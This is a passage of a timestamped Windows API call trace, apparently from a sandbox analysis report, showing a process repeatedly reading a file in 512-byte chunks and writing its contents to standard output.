lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] GetFileType (hFile=0x50) returned 0x1 [0142.927] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.927] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.928] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.928] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType 
(hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] GetFileType (hFile=0x50) returned 0x1 [0142.928] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.928] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.929] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.929] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, 
lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] GetFileType (hFile=0x50) returned 0x1 [0142.929] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.929] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.930] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.930] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] GetFileType (hFile=0x50) returned 0x1 [0142.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.930] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: 
hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.931] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.931] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.931] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0142.931] GetFileType (hFile=0x50) returned 0x1 [0142.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.931] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 
[0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.932] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.932] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] GetFileType (hFile=0x50) returned 0x1 [0142.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.932] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, 
lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.933] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.933] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.933] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ebbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ec0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec0c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ec5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ec5c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ecac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecac*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 
0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ecfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ecfc*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ed4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed4c*, lpNumberOfBytesWritten=0x20dda0*=0x50, lpOverlapped=0x0) returned 1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] GetFileType (hFile=0x50) returned 0x1 [0142.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.934] WriteFile (in: hFile=0x50, lpBuffer=0x20ed9c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x20dda0, lpOverlapped=0x0 | out: lpBuffer=0x20ed9c*, lpNumberOfBytesWritten=0x20dda0*=0x20, lpOverlapped=0x0) returned 1 [0142.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x20dd8c | out: lpNewFilePointer=0x0) returned 1 [0142.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.935] GetFileType (hFile=0x50) returned 0x1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, lpNumberOfBytesRead=0x20ddac*=0x200, lpOverlapped=0x0) returned 1 [0142.935] ReadFile (in: hFile=0x58, lpBuffer=0x20ebbc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x20ddac, lpOverlapped=0x0 | out: lpBuffer=0x20ebbc*, 
